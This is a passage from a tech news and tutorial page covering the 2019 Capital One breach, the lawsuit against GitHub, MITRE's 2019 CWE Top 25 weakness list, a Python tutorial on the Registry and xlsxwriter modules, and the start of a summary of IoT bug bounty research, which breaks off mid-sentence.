time, Martini said that much of the evidence tying her to the intrusion came directly from things she posted to social media or put in direct messages”, Ars Technica reports. On  July 17, a tipster wrote to a Capital One security hotline, warning that some of the bank’s data appeared to have been “leaked,” the criminal complaint said. According to The New York Times, Thompson “left a trail online for investigators to follow as she boasted about the hacking, according to court documents in Seattle”. She is listed as the organizer of a group on Meetup, a social network, called Seattle Warez Kiddies, a gathering for “anybody with an appreciation for distributed systems, programming, hacking, cracking.” The F.B.I. noticed her activity on Meetup and used it to trace her other online activities, eventually linking her to posts boasting about the data theft on Twitter and the Slack messaging service.  “I’ve basically strapped myself with a bomb vest, dropping capital ones dox and admitting it,” Thompson posted on Slack, prosecutors say. Highly sensitive financial and social insurance data compromised The stolen data was stored in Amazon S3, "An AWS spokesman confirmed that the company’s cloud had stored the Capital One data that was stolen, and said it wasn’t accessed through a breach or vulnerability in AWS systems", Bloomberg reports. Capital One said the largest category of information accessed was information on consumers and small businesses as of the time they applied for one of its credit card products from 2005 through early 2019. The breached data included personal information Capital One routinely collects at the time it receives credit card applications, including names, addresses, zip codes/postal codes, phone numbers, email addresses, dates of birth, and self-reported income. The hacker also obtained customer status data, e.g., credit scores, credit limits, balances, payment history, contact information including fragments of transaction data from a total of 23 days during 2016, 2017 and 2018. For the Canadian credit card customers, approximately 1 million Social Insurance Numbers were compromised in this incident. About 140,000 Social Security numbers of Capital One's credit card customers and about 80,000 linked bank account numbers of our secured credit card customers were compromised. Richard D. Fairbank, Capital One’s chief executive officer, said in a statement, "I am deeply sorry for what has happened. I sincerely apologize for the understandable worry this incident must be causing those affected.” Thompson is charged with computer fraud and faces a maximum penalty of five years in prison and a $250,000 fine. U.S. Magistrate Judge Mary Alice Theiler ordered Thompson to be held. A bail hearing is set for Aug 1. Capital One said, it “will notify affected individuals through a variety of channels. We will make free credit monitoring and identity protection available to everyone affected”. Capital One's justification of "Facts" is unsatisfactory Users are very skeptical about trusting Capital One with their data going ahead. A user on Hacker News writes, “Obviously this person committed a criminal act, however, Capital One should also shoulder responsibility for not securing customer data. I have a feeling we'd be waiting a long time for accountability on C1's part.” Security experts are surprised with Capital One’s stating of “facts that say “no Social Security numbers were breached’ and say this cannot be true. https://twitter.com/zackwhittaker/status/1156027826912428032 https://twitter.com/DavidAns/status/1156014432511643649 https://twitter.com/GossiTheDog/status/1156232048975273986 Similar to Capital One, there were other data breaches in the past where the companies have agreed on a settlement to help the affected customers like the Equifax or have been levied with huge fines like the Marriott International and British Airways. The Equifax data breach that affected 143 million U.S. consumers on September 7, 2017, resulted in a global settlement including up to $425 million to help people affected by the data breach amounting to approximately $125 per affected victim, should they apply for compensation. This global settlement was done with the Federal Trade Commission, the Consumer Financial Protection Bureau, and 50 U.S. states and territories. The Marriott data breach occurred in Marriott’s Starwood guest database that compromised 383 million user data was revealed on November 19, 2018. Recently, the Information Commissioner’s Office (ICO) in the UK announced its plans to impose a fine of more than £99 million ($124 million) under GDPR. The British Airways data breach compromised personal identification information of over 500,000 customers and is believed to have begun in June 2018. Early this month, the ICO also announced it will fine British Airways with more than £183m fine. As a major data breach in one of the largest banks, Capital One could feel the pinch by regulators soon. What sets this case apart from the above breaches is that the affected customers are from the US and Canada and not from the EU. In the absence of regulatory action by the ICO or the EU commission, it is yet to be seen if regulators in the US and Canada will rise to the challenge. Also, now that the alleged hacker has been arrested, does this mean Capital One could slip by without paying any significant fine? Only time can tell if Capital One will pay a huge sum to the regulators for not being watchful of their customers' data in two different states. If the Equifax-FTC case and the Facebook-FTC proceedings are any sign of things to come, Capital One has not much to be concerned about. To know more about this news in detail, read Capital One’s official announcement. Thompson faces additional charges for hacking into the AWS accounts of about 30 organizations On 28th August, an indictment was filed in a US federal district court, where the investigators mentioned they have identified most of the companies and institutions allegedly hit by Thompson. The prosecutors said Thompson wrote software that scanned for customer accounts hosted by a “cloud computing company,” which is believed to be her former employer, AWS or Amazon Web Services. "It is claimed she specifically looked for accounts that suffered a common security hole – specifically, a particular web application firewall misconfiguration – and exploited this weakness to hack into the AWS accounts of some 30 organizations, and siphon their data to her personal server. She also used the hacked cloud-hosted systems to mine cryptocurrency for herself, it is alleged," The Register reports. “The object of the scheme was to exploit the fact that certain customers of the cloud computing company had misconfigured web application firewalls on the servers that they rented or contracted from the cloud computing company,” the indictment reads. The indictment further reads, “The object was to use that misconfiguration in order to obtain credentials for accounts of those customers that had permission to view and copy data stored by the customers on their cloud computing company servers. The object then was to use those stolen credentials in order to access and copy other data stored by the customers.” Thus, she also faces a computer abuse charge over the 30 other AWS-hosted organizations she allegedly hacked and stole information from. Facebook fails to fend off a lawsuit over a data breach of nearly 30 million users US Customs and Border Protection reveal data breach that exposed thousands of traveler photos and license plate images Over 19 years of ANU(Australian National University) students’ and staff data breached
Read more
  • 0
  • 0
  • 34533

article-image-mitres-2019-cwe-top-25-most-dangerous-software-errors-list-released
Savia Lobo
19 Sep 2019
10 min read
Save for later

MITRE’s 2019 CWE Top 25 most dangerous software errors list released

Savia Lobo
19 Sep 2019
10 min read
Two days ago, the Cybersecurity and Infrastructure Security Agency (CISA) announced MITRE’s 2019 Common Weakness Enumeration (CWE) Top 25 Most Dangerous Software Errors list. This list includes a compilation of the most frequent and critical errors that can lead to serious vulnerabilities in software. For aggregating the data for this list, the CWE Team used a data-driven approach that leverages published Common Vulnerabilities and Exposures (CVE®) data and related CWE mappings found within the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD), as well as the Common Vulnerability Scoring System (CVSS) scores associated with the CVEs. The team then applied a scoring formula (elaborated in later sections) to determine the level of prevalence and danger each weakness presents.  This Top 25 list of errors include the NVD data from the years 2017 and 2018, which consisted of approximately twenty-five thousand CVEs. The previous SANS/CWE Top 25 list was released in 2011 and the major difference between the lists released in the year 2011 and the current 2019 is in the approach used. In 2011, the data was constructed using surveys and personal interviews with developers, top security analysts, researchers, and vendors. These responses were normalized based on the prevalence, ranked by the CWSS methodology. However, in the 2019 CWE Top 25, the list was formed based on the real-world vulnerabilities found in NVD’s data. CWE Top 25 dangerous software errors, developers should watch out for  Improper Restriction of Operations within the Bounds of a Memory Buffer In this error(CWE-119), the software performs operations on a memory buffer. However, it can read from or write to a memory location that is outside of the intended boundary of the buffer. The likelihood of exploit of this error is high as an attacker may be able to execute arbitrary code, alter the intended control flow, read sensitive information, or cause the system to crash.  This error can be exploited in any programming language without memory management support to attempt an operation outside of the bounds of a memory buffer, but the consequences will vary widely depending on the language, platform, and chip architecture. Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') This error, CWE-79, can cause the software to incorrectly neutralize the user-controllable input before it is placed in output that is used as a web page that is served to other users. Once the malicious script is injected, the attacker could transfer private information, such as cookies that may include session information, from the victim's machine to the attacker. This error can also allow attackers to send malicious requests to a website on behalf of the victim, which could be especially dangerous to the site if the victim has administrator privileges to manage that site. Such XSS flaws are very common in web applications since they require a great deal of developer discipline to avoid them. Improper Input Validation With this error, CWE-20, the product does not validate or incorrectly validates input thus affecting the control flow or data flow of a program. This can allow an attacker to craft the input in a form that is not expected by the rest of the application. This will lead to parts of the system receiving unintended input, which may result in an altered control flow, arbitrary control of a resource, or arbitrary code execution. Input validation is problematic in any system that receives data from an external source. “CWE-116 [Improper Encoding or Escaping of Output] and CWE-20 have a close association because, depending on the nature of the structured message, proper input validation can indirectly prevent special characters from changing the meaning of a structured message,” the researchers mention in the CWE definition post.  Information Exposure This error, CWE-200, is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized to have access to that information. According to the CEW- Individual Dictionary Definition, “Many information exposures are resultant (e.g. PHP script error revealing the full path of the program), but they can also be primary (e.g. timing discrepancies in cryptography). There are many different types of problems that involve information exposures. Their severity can range widely depending on the type of information that is revealed.” This error can be executed for specific named Languages, Operating Systems, Architectures, Paradigms(Mobiles), Technologies, or a class of such platforms. Out-of-bounds Read In this error, CWE-125, the software reads data past the end, or before the beginning, of the intended buffer. This can allow attackers to read sensitive information from other memory locations or cause a crash. The software may modify an index or perform pointer arithmetic that references a memory location that is outside of the boundaries of the buffer.  This error may occur for specific named Languages (C, C++), Operating Systems, Architectures, Paradigms, Technologies, or a class of such platforms.  Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') In this error (weakness ID: CWE-89) the software constructs all or part of an SQL command using externally-influenced input from an upstream component. However, it incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. This error can be used to alter query logic to bypass security checks, or to insert additional statements that modify the back-end database, possibly including the execution of system commands. It can occur in specific named Languages, Operating Systems, Architectures, Paradigms, Technologies, or a class of such platforms. Cross-Site Request Forgery (CSRF) This error CWE-352, the web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request. This might allow an attacker to trick a client into making an unintentional request to the webserver which will be treated as an authentic request. The likelihood of the occurrence of this error is medium.  This can be done via a URL, image load, XMLHttpRequest, etc. and can result in the exposure of data or unintended code execution.  Integer Overflow or Wraparound In this error, CWE-190, the software performs a calculation that can produce an integer overflow or wraparound, when the logic assumes that the resulting value will always be larger than the original value. This can introduce other weaknesses when the calculation is used for resource management or execution control. Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') In this error, CWE-22, the software uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory. However, the software does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.  In most programming languages, injection of a null byte (the 0 or NUL) may allow an attacker to truncate a generated filename to widen the scope of attack. For example, when the software adds ".txt" to any pathname, this may limit the attacker to text files, but a null injection may effectively remove this restriction. Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') In this error, CWE-78, the software constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component. This error can allow attackers to execute unexpected, dangerous commands directly on the operating system. This weakness can lead to a vulnerability in environments in which the attacker does not have direct access to the operating system, such as in web applications.  Alternately, if the weakness occurs in a privileged program, it could allow the attacker to specify commands that normally would not be accessible, or to call alternate commands with privileges that the attacker does not have. The researchers write, “More investigation is needed into the distinction between the OS command injection variants, including the role with argument injection (CWE-88). Equivalent distinctions may exist in other injection-related problems such as SQL injection.” Here’s the list of the remaining errors from MITRE’s 2019 CWE Top 25 list: CWE ID Name of the Error Average CVSS score CWE-416 Use After Free 17.94 CWE-287 Improper Authentication 10.78 CWE-476 NULL Pointer Dereference 9.74 CWE-732  Incorrect Permission Assignment for Critical Resource 6.33 CWE-434 Unrestricted Upload of File with Dangerous Type 5.50 CWE-611 Improper Restriction of XML External Entity Reference 5.48 CWE-94 Improper Control of Generation of Code ('Code Injection') 5.36 CWE-798 Use of Hard-coded Credentials 5.1 CWE-400 Uncontrolled Resource Consumption 5.04 CWE-772  Missing Release of Resource after Effective Lifetime 5.04 CWE-426  Untrusted Search Path 4.40 CWE-502 Deserialization of Untrusted Data 4.30 CWE-269 Improper Privilege Management 4.23 CWE-295 Improper Certificate Validation 4.06 To know about the other errors in detail, read CWE’s official report. Scoring formula to calculate the rank of weaknesses The CWE team had developed a scoring formula to calculate a rank order of weaknesses. The scoring formula combines the frequency that a CWE is the root cause of vulnerability with the projected severity of its exploitation. In both cases, the frequency and severity are normalized relative to the minimum and maximum values seen.  A few properties of the scoring method include: Weaknesses that are rarely exploited will not receive a high score, regardless of the typical severity associated with any exploitation. This makes sense, since if developers are not making a particular mistake, then the weakness should not be highlighted in the CWE Top 25. Weaknesses with a low impact will not receive a high score. This again makes sense, since the inability to cause significant harm by exploiting a weakness means that weakness should be ranked below those that can.  Weaknesses that are both common and can cause harm should receive a high score. However, there are a few limitations to the methodology of the data-driven approach chosen by the CWE Team. Limitations of the data-driven methodology This approach only uses data publicly reported and captured in NVD, while numerous vulnerabilities exist that do not have CVE IDs. Vulnerabilities that are not included in NVD are therefore excluded from this approach. For vulnerabilities that receive a CVE, often there is not enough information to make an accurate (or precise) identification of the appropriate CWE that is exploited.  There is an inherent bias in the CVE/NVD dataset due to the set of vendors that report vulnerabilities and the languages that are used by those vendors. If one of the largest contributors to CVE/NVD primarily uses C as its programming language, the weaknesses that often exist in C programs are more likely to appear.  Another bias in the CVE/NVD dataset is that most vulnerability researchers and/or detection tools are very proficient at finding certain weaknesses but do not find other types of weaknesses. Those types of weaknesses that researchers and tools struggle to find will end up being under-represented within 2019 CWE Top 25. Gaps or perceived mischaracterizations of the CWE hierarchy itself lead to incorrect mappings.  In Metric bias, it indirectly prioritizes implementation flaws over design flaws, due to their prevalence within individual software packages. For example, a web application may have many different cross-site scripting (XSS) vulnerabilities due to a large attack surface, yet only one instance of the use of an insecure cryptographic algorithm. https://twitter.com/mattfahrner/status/1173984732926943237 To know more about this CWE Top 25 list in detail, head over to MITRE’s CWE Top 25 official page.  Other news in Security LastPass patched a security vulnerability from the extensions generated on pop-up windows An unsecured Elasticsearch database exposes personal information of 20 million Ecuadoreans including 6.77M children under 18 A new Stuxnet-level vulnerability named Simjacker used to secretly spy over mobile phones in multiple countries for over 2 years: Adaptive Mobile Security reports
Read more
  • 0
  • 0
  • 34292
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at €18.99/month. Cancel anytime
article-image-following-capital-one-data-breach-github-gets-sued-and-aws-security-questioned-by-a-u-s-senator
Savia Lobo
07 Aug 2019
5 min read
Save for later

Following Capital One data breach, GitHub gets sued and AWS security questioned by a U.S. Senator

Savia Lobo
07 Aug 2019
5 min read
Last week, Capital One revealed it was subject to a major data breach due to a configuration vulnerability in its firewall to access its Amazon S3 database, affecting 106 million users in the US and Canada. A week after the breach, not only Capital One, but GitHub and Amazon are also facing scrutiny for their inadvertent role in the breach. Capital One and GitHub sued in California Last week, the law firm Tycko & Zavareei LLP filed a lawsuit in California's federal district court on behalf of their plaintiffs Seth Zielicke and Aimee Aballo. Both plaintiffs claim Capital One and GitHub were unable to protect user’s personal data. The complaint highlighted that Paige A. Thompson, the alleged hacker stole the data in March, posted about the theft on GitHub in April. According to the lawsuit, “As a result of GitHub’s failure to monitor, remove, or otherwise recognize and act upon obviously-hacked data that was displayed, disclosed, and used on or by GitHub and its website, the Personal Information sat on GitHub.com for nearly three months.” The law firm also alleged that with the help of computer logs, Capital One should have known about the data breach when the information was first stolen in March. They “criticized Capital One for not taking action to respond to the breach until last month,” The Hill reports. The lawsuit also alleges that GitHub “encourages (at least) friendly hacking." "GitHub had an obligation, under California law, to keep off (or to remove from) its site Social Security numbers and other Personal Information," the lawsuit further mentions. According to Newsweek, GitHub also violated the federal Wiretap Act, "which permits civil recovery for those whose 'wire, oral, or electronic communication' has been 'intercepted, disclosed, or intentionally used' in violation of, inter alia, the Wiretap Act." A GitHub spokesperson told Newsweek, "GitHub promptly investigates content, once it's reported to us, and removes anything that violates our Terms of Service." "The file posted on GitHub in this incident did not contain any Social Security numbers, bank account information, or any other reportedly stolen personal information. We received a request from Capital One to remove content containing information about the methods used to steal the data, which we took down promptly after receiving their request," the spokesperson further added. On 30th July, New York Attorney General, Letitia James also announced that her office is opening an investigation into the Capital One data breach. “My office will begin an immediate investigation into Capital One’s breach, and will work to ensure that New Yorkers who were victims of this breach are provided relief. We cannot allow hacks of this nature to become every day occurrences,” James said in a statement. Many are confused about why a lawsuit was filed against GitHub as they believe that GitHub is not at fault. Tony Webster, a journalist, and a public records researcher tweeted, “I genuinely can't tell if this lawsuit is incompetence or malice. GitHub owed no duty to CapitalOne customers. This would be like suing a burglar's landlord because they didn't detect and stop their tenant from selling your stolen TV from their apartment.” https://twitter.com/rickhholland/status/1157658909563379713 https://twitter.com/NSQE/status/1157479467805057024 https://twitter.com/xxdesmus/status/1157679112699277312 A user on HackerNews writes, “This is incredible: they're suggesting that, in the same way that YouTube has content moderators, GitHub should moderate every repository that has a 9-digit sequence. They also say that GitHub "promotes hacking" without any nuance regarding modern usage of the word, and they claim that GitHub had a "duty" to put processes in place to monitor submitted content, and that by not having such processes they were in violation of their own terms of service. I hope that this gets thrown out. If not, it could have severe consequences for any site hosting user-generated content.” Read the lawsuit to know more about this news in detail. U.S. Senator’s letter to Amazon CEO raises questions on the security of AWS products Yesterday, Senator Ron Wyden wrote to Amazon’s CEO, Jeff Bezos “requesting details about the security of Amazon’s cloud service”, the Wall Street Journal reports. The letter has put forth questions to understand how the configuration error occurs and what measures is Amazon taking to protect its customers. The Journal reported, “more than 800 Amazon users were found vulnerable to a similar configuration error, according to a partial scan of cloud users, conducted in February by a security researcher.” According to the Senator’s letter, “When a major corporation loses data on a hundred million Americans because of a configuration error, attention naturally focuses on that corporation’s cybersecurity practices.” “However, if several organizations all make similar configuration errors, it is time to ask whether the underlying technology needs to be made safer and whether the company that makes it shares responsibility for the breaches,” the letter further mentions. Jeff Bezos has been asked to reply to these questions by August 13, 2019. “Amazon has said that its cloud products weren’t the cause of the breach and that it provides tools to alert customers when data is being improperly accessed,” WSJ reports. Capital One did not comment on this news. Read the complete letter to know more in detail. U.S. Senator introduces a bill that levies jail time and hefty fines for companies violating data breaches Facebook fails to fend off a lawsuit over data breach of nearly 30 million users Equifax breach victims may not even get the promised $125; FTC urges them to opt for 10-year free credit monitoring services
Read more
  • 0
  • 0
  • 33967

article-image-using-registry-and-xlswriter-modules
Packt
14 Apr 2016
12 min read
Save for later

Using the Registry and xlswriter modules

Packt
14 Apr 2016
12 min read
In this article by Chapin Bryce and Preston Miller, the authors of Learning Python for Forensics, we will learn about the features offered by the Registry and xlswriter modules. (For more resources related to this topic, see here.) Working with the Registry module The Registry module, developed by Willi Ballenthin, can be used to obtain keys and values from registry hives. Python provides a built-in registry module called _winreg; however, this module only works on Windows machines. The _winreg module interacts with the registry on the system running the module. It does not support opening external registry hives. The Registry module allows us to interact with the supplied registry hives and can be run on non-Windows machines. The Registry module can be downloaded from https://github.com/williballenthin/python-registry. Click on the releases section to see a list of all the stable versions and download the latest version. For this article, we use version 1.1.0. Once the archived file is downloaded and extracted, we can run the included setup.py file to install the module. In a command prompt, execute the following code in the module's top-level directory as shown: python setup.py install This should install the Registry module successfully on your machine. We can confirm this by opening the Python interactive prompt and typing import Registry. We will receive an error if the module is not installed successfully. With the Registry module installed, let's begin to learn how we can leverage this module for our needs. First, we need to import the Registry class from the Registry module. Then, we use the Registry function to open the registry object that we want to query. Next, we use the open() method to navigate to our key of interest. In this case, we are interested in the RecentDocs registry key. This key contains recent active files separated by extension as shown: >>> from Registry import Registry >>> reg = Registry.Registry('NTUSER.DAT') >>> recent_docs = reg.open('SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs') If we print therecent_docs variable, we can see that it contains 11 values with five subkeys, which may contain additional values and subkeys. Additionally, we can use thetimestamp() method to see the last written time of the registry key. >>> print recent_docs Registry Key CMI-CreateHive{B01E557D-7818-4BA7-9885-E6592398B44E}SoftwareMicrosoftWindowsCurrentVersionExplorerRecentDocs with 11 values and 5 subkeys >>> print recent_docs.timestamp() # Last Written Time 2012-04-23 09:34:12.099998 We can iterate over the values in the recent_docs key using the values() function in a for loop. For each value, we can access the name(), value(), raw_data(), value_type(), and value_type_str() methods. The value() and raw_data() represent the data in different ways. We will use the raw_data() function when we want to work with the underlying binary data and use the value() function to gather an interpreted result. The value_type() and value_type_str() functions display a number or string that identify the type of data, such as REG_BINARY, REG_DWORD, REG_SZ, and so on. >>> for i, value in enumerate(recent_docs.values()): ... print '{}) {}: {}'.format(i, value.name(), value.value()) ... 0) MRUListEx: ???? 1) 0: myDocument.docx 2) 4: oldArchive.zip 3) 2: Salaries.xlsx ... Another useful feature of the Registry module is the means provided for querying for a certain subkey or value. This is provided by the subkey(), value(), or find_key() functions. A RegistryKeyNotFoundException is generated when a subkey is not present while using the subkey() function: >>> if recent_docs.subkey('.docx'): ... print 'Found docx subkey.' ... Found docx subkey. >>> if recent_docs.subkey('.1234abcd'): ... print 'Found 1234abcd subkey.' ... Registry.Registry.RegistryKeyNotFoundException: ... The find_key() function takes a path and can find a subkey through multiple levels. The subkey() and value() functions only search child elements. We can use these functions to confirm that a key or value exists before trying to navigate to them. If a particular key or value cannot be found, a custom exception from the Registry module is raised. Be sure to add error handling to catch this error and also alert the user that the key was not discovered. With the Registry module, finding keys and their values becomes straightforward. However, when the values are not strings and are instead binary data we have to rely on another module to make sense of the mess. For all binary needs, the struct module is an excellent candidate. Read also: Tools for Working with Excel and Python Creating Spreadsheets with the xlsxwriter Module Xlsxwriter is a useful third-party module that writes Excel output. There are a plethora of Excel-supported modules for Python, but we chose this module because it was highly robust and well-documented. As the name suggests, this module can only be used to write Excel spreadsheets. The xlsxwriter module supports cell and conditional formatting, charts, tables, filters, and macros among others. Adding data to a spreadsheet Let's quickly create a script called simplexlsx.v1.py for this example. On lines 1 and 2 we import the xlsxwriter and datetime modules. The data we are going to be plotting, including the header column is stored as nested lists in the school_data variable. Each list is a row of information that we want to store in the output excel sheet, with the first element containing the column names. 001 import xlsxwriter 002 from datetime import datetime 003 004 school_data = [['Department', 'Students', 'Cumulative GPA', 'Final Date'], 005 ['Computer Science', 235, 3.44, datetime(2015, 07, 23, 18, 00, 00)], 006 ['Chemistry', 201, 3.26, datetime(2015, 07, 25, 9, 30, 00)], 007 ['Forensics', 99, 3.8, datetime(2015, 07, 23, 9, 30, 00)], 008 ['Astronomy', 115, 3.21, datetime(2015, 07, 19, 15, 30, 00)]] The writeXLSX() function, defined on line 11, is responsible for writing our data in to a spreadsheet. First, we must create our Excel spreadsheet using the Workbook() function supplying the desired name of the file. On line 13, we create a worksheet using the add_worksheet() function. This function can take the desired title of the worksheet or use the default name 'Sheet N', where N is the specific sheet number. 011 def writeXLSX(data): 012 workbook = xlsxwriter.Workbook('MyWorkbook.xlsx') 013 main_sheet = workbook.add_worksheet('MySheet') The date_format variable stores a custom number format that we will use to display our datetime objects in the desired format. On line 17, we begin to enumerate through our data to write. The conditional on line 18 is used to handle the header column which is the first list encountered. We use the write() function and supply a numerical row and column. Alternatively, we can also use the Excel notation, i.e. A1. 015 date_format = workbook.add_format({'num_format': 'mm/dd/yy hh:mm:ss AM/PM'}) 016 017 for i, entry in enumerate(data): 018 if i == 0: 019 main_sheet.write(i, 0, entry[0]) 020 main_sheet.write(i, 1, entry[1]) 021 main_sheet.write(i, 2, entry[2]) 022 main_sheet.write(i, 3, entry[3]) The write() method will try to write the appropriate type for an object when it can detect the type. However, we can use different write methods to specify the correct format. These specialized writers preserve the data type in Excel so that we can use the appropriate data type specific Excel functions for the object. Since we know the data types within the entry list, we can manually specify when to use the general write() function or the specific write_number() function. 023 else: 024 main_sheet.write(i, 0, entry[0]) 025 main_sheet.write_number(i, 1, entry[1]) 026 main_sheet.write_number(i, 2, entry[2]) For the fourth entry in the list, thedatetime object, we supply the write_datetime() function with our date_format defined on line 15. After our data is written to the workbook, we use the close() function to close and save our data. On line 32, we call the writeXLSX() function passing it to the school_data list we built earlier. 027 main_sheet.write_datetime(i, 3, entry[3], date_format) 028 029 workbook.close() 030 031 032 writeXLSX(school_data) A table of write functions and the objects they preserve is presented below. Function Supported Objects write_string str write_number int, float, long write_datetime datetime objects write_boolean bool write_url str When the script is invoked at the Command Line, a spreadsheet called MyWorkbook.xlsx is created. When we convert this to a table, we can sort it according to any of our values. Had we failed to preserve the data types values such as our dates might be identified as non-number types and prevent us from sorting them appropriately. Building a table Being able to write data to an Excel file and preserve the object type is a step-up over CSV, but we can do better. Often, the first thing an examiner will do with an Excel spreadsheet is convert the data into a table and begin the frenzy of sorting and filtering. We can convert our data range to a table. In fact, writing a table with xlsxwriter is arguably easier than writing each row individually. The following code will be saved into the file simplexlsx.v2.py. For this iteration, we have removed the initial list in the school_data variable that contained the header information. Our new writeXLSX() function writes the header separately. 004 school_data = [['Computer Science', 235, 3.44, datetime(2015, 07, 23, 18, 00, 00)], 005 ['Chemistry', 201, 3.26, datetime(2015, 07, 25, 9, 30, 00)], 006 ['Forensics', 99, 3.8, datetime(2015, 07, 23, 9, 30, 00)], 007 ['Astronomy', 115, 3.21, datetime(2015, 07, 19, 15, 30, 00)]] Lines 10 through 14 are identical to the previous iteration of the function. Representing our table on the spreadsheet is accomplished on line 16. 010 def writeXLSX(data): 011 workbook = xlsxwriter.Workbook('MyWorkbook.xlsx') 012 main_sheet = workbook.add_worksheet('MySheet') 013 014 date_format = workbook.add_format({'num_format': 'mm/dd/yy hh:mm:ss AM/PM'}) The add_table() function takes multiple arguments. First, we pass a string representing the top-left and bottom-right cells of the table in Excel notation. We use the length variable, defined on line 15, to calculate the necessary length of our table. The second argument is a little more confusing; this is a dictionary with two keys, named data and columns. The data key has a value of our data variable, which is perhaps poorly named in this case. The columns key defines each row header and, optionally, its format, as seen on line 19: 015 length = str(len(data) + 1) 016 main_sheet.add_table(('A1:D' + length), {'data': data, 017 'columns': [{'header': 'Department'}, {'header': 'Students'}, 018 {'header': 'Cumulative GPA'}, 019 {'header': 'Final Date', 'format': date_format}]}) 020 workbook.close() In lesser lines than the previous example, we've managed to create a more useful output built as a table. Now our spreadsheet has our specified data already converted into a table and ready to be sorted. There are more possible keys and values that can be supplied during the construction of a table. Please consult the documentation at (http://xlsxwriter.readthedocs.org) for more details on advanced usage. This process is simple when we are working with nested lists representing each row of a worksheet. Data structures not in the specified format require a combination of both methods demonstrated in our previous iterations to achieve the same effect. For example, we can define a table to span across a certain number of rows and columns and then use the write() function for those cells. However, to prevent unnecessary headaches we recommend keeping data in nested lists. Creating charts with Python Lastly, let's create a chart with xlsxwriter. The module supports a variety of different chart types including: line, scatter, bar, column, pie, and area. We use charts to summarize the data in meaningful ways. This is particularly useful when working with large data sets, allowing examiners to gain a high level of understanding of the data before getting into the weeds. Let's modify the previous iteration yet again to display a chart. We will save this modified file as simplexlsx.v3.py. On line 21, we are going to create a variable called department_grades. This variable will be our chart object created by the add_chart()method. For this method, we pass in a dictionary specifying keys and values[SS4] . In this case, we specify the type of the chart to be a column chart. 021 department_grades = workbook.add_chart({'type':'column'}) On line 22, we use theset_title() function and again pass it in a dictionary of parameters. We set the name key equal to our desired title. At this point, we need to tell the chart what data to plot. We do this with the add_series() function. Each category key maps to the Excel notation specifying the horizontal axis data. The vertical axis is represented by the values key. With the data to plot specified, we use theinsert_chart() function to plot the data in the spreadsheet. We give this function a string of the cell to plot the top-left of the chart and then the chart object itself. 022 department_grades.set_title({'name':'Department and Grade distribution'}) 023 department_grades.add_series({'categories':'=MySheet!$A$2:$A$5', 'values':'=MySheet!$C$2:$C$5'}) 024 main_sheet.insert_chart('A8', department_grades) 025 workbook.close() Running this version of the script will convert our data into a table and generate a column chart comparing departments by their grades. We can clearly see that, unsurprisingly, the Forensic Science department has the highest GPA earners in the school's program. This information is easy enough to eyeball for such a small data set. However, when working with data orders of larger magnitude, creating summarizing graphics can be particularly useful to understand the big picture. Be aware that there is a great deal of additional functionality in the xlsxwriter module that we will not use in our script. This is an extremely powerful module and we recommend it for any operation that requires writing Excel spreadsheets. Summary In this article, we began with introducing the Registry module and how it is used to obtain keys and values from registry hives. Next, we dealt with various aspects of spreadsheets, such as cells, tables, and charts using the xlswriter module. Resources for Article: Further resources on this subject: Test all the things with Python [article] An Introduction to Python Lists and Dictionaries [article] Python Data Science Up and Running [article]
Read more
  • 0
  • 0
  • 33740

article-image-researchers-release-a-study-into-bug-bounty-programs-and-responsible-disclosure-for-ethical-hacking-in-iot
Savia Lobo
30 Sep 2019
6 min read
Save for later

Researchers release a study into Bug Bounty Programs and Responsible Disclosure for ethical hacking in IoT

Savia Lobo
30 Sep 2019
6 min read
On September 26, a few researchers from the Delft University of Technology (TU Delft) in the Netherlands, released a research paper which highlighted the importance of crowdsource ethical hacking approaches for enhancing IoT vulnerability management. They have focussed on Bug Bounty Programs (BBP) and Responsible Disclosure (RD), which stimulate hackers to report vulnerabilities in exchange for monetary rewards. Supported by literature survey and expert interviews, these researchers carried out an investigation on how BBP and RD can facilitate the practice of identifying, classifying, prioritizing, remediating, and mitigating IoT vulnerabilities in an effective and cost-efficient manner. The researchers have also made recommendations on how BBP and RD can be integrated with the existing security practices to further boost the IoT security. The researchers first identified the causes for lack of security practices in IoT from socio-technical and commercial perspectives. By identifying the hidden pitfalls and blind spots, stakeholders can avoid repeating the same mistakes. They have also derived a set of recommendations as best-practices that can benefit IoT vendors, developers, and regulators. The researcher in their paper added, “We note that this study does not intend to cover all the potential vulnerabilities in IoT nor to provide an absolute solution to cure the IoT security puzzle. Instead, our focus is to provide practical and tangible recommendations and potentially new options for stakeholders to tackle IoT-oriented vulnerabilities in consumer goods, which will help enhance the overall IoT security practices.” Challenges in IoT Security The researchers have highlighted six major reasons from the system and device perspective: IoT systems do not have well-defined perimeters as they can continuously change. IoT systems are highly heterogeneous with respect to communication medium and protocols. IoT systems often include devices that are not designed to be connected to the Internet or for being secure. IoT devices can often autonomously control other IoT devices without human supervision. IoT devices could be physically unprotected and/or controlled by different parties. The large number of devices increases the security complexity The other practical challenges for IoT include the fact that enterprises targeting end-users do not have security as a priority and are generally driven by time-to-market instead of by security requirements. Several IoT products are the results of an increasing number of startup companies that have entered this market recently. This vast majority of startups accounts for less than 10 employees, and their obvious priority is to develop functional rather than secure products. In this scenario, investing in security can be perceived as a costly and time-consuming obstacle. In addition, consumers demand for security is low, and they tend to prefer cheaper rather than secure products. As a result, companies lack explicit incentives to invest in security. Crowdsourced security methods: An alternative in Ethical Hacking "Government agencies and business organizations today are in constant need of ethical hackers to combat the growing threat to IT security. A lot of government agencies, professionals and corporations now understand that if you want to protect a system, you cannot do it by just locking your doors," the researchers observe. The benefits of Ethical Hacking include: Preventing data from being stolen and misused by malicious attackers. Discovering vulnerabilities from an attacker’s point of view so to fix weak points. Implementing a secure network that prevents security breaches. Protecting networks with real-world assessments. Gaining trust from customers and investors by ensuring security. Defending national security by 